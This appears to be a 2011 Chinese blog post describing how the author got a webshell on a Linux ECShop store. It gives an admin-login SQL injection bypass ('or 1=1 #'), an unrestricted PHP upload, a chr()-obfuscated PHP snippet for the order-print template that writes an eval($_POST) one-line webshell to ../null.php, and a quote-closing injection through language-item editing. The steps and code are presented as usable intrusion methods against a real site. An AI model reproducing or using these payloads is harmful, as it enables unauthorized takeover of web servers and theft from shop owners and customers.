linux系統ecshop拿shell方法

標籤：

Title:linux系統ecshop拿shell方法  --2011-06-08 13:23

最近弄一個站，對ECSHOP拿shell不瞭解，導致走了很多的彎路。

nginx/0.8.54的伺服器,magic_quotes_gpc開啟轉義,很多的頁面被刪除了。

後台有or漏洞，使用者"‘ or 1=1 #"密碼隨便填.

開始我也不知道，瞭解得少。

網站的myship.php訪問無果，但是庫專案管理模版可以編輯，找不到檔案路徑未果,因為用的是nginx/0.8.54，解析漏洞被修補。

很多拿shell的方法不能用，比如備份x.php.spl,FCK建立X.asp類檔案夾。

開始在後台轉了很久，一直沒有點Flash 播放器管理 上次PHP試試，後面沒有想到可以上傳PHP的檔案，沒有限制。

 

後面再上網找了下其他的方法。

後台-訂單管理-訂單列印-選擇原始碼編輯-儲存
返回訂單列表，隨意選擇一個訂單列印，返回OK，產生一句話成功！
以下是編輯的代碼:

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

<?
$filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112);
$filec=chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(117).chr(115).chr(98).chr(93).chr(41).chr(59).chr(63).chr(62);
$a=chr(119);
[email protected]($filen,$a);
[email protected]($fp,$filec);
if($msg) echo chr(79).chr(75).chr(33);
@fclose($fp);
?>

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------

../null.php

<?php eval($_post[usb]);?>

這個是路徑和密碼。

我還有個想法就是‘單引號沒有被轉義的時候,管理中心- 語言項編輯 編輯其中的PHP頁面,閉合單引號.

shopping_flow.php 編輯

輸入語言項關鍵字：  活動列表

活動列表‘;?><?php @eval($_POST[ok]);?><?‘ok

儲存

然後訪問

http://site/languages/zh_cn/shopping_flow.php

因為試的時候‘被轉義不能閉合活動列表後面的單引號，所以沒成功。

誰有其他方法，可以一起討論下。

linux系統ecshop拿shell方法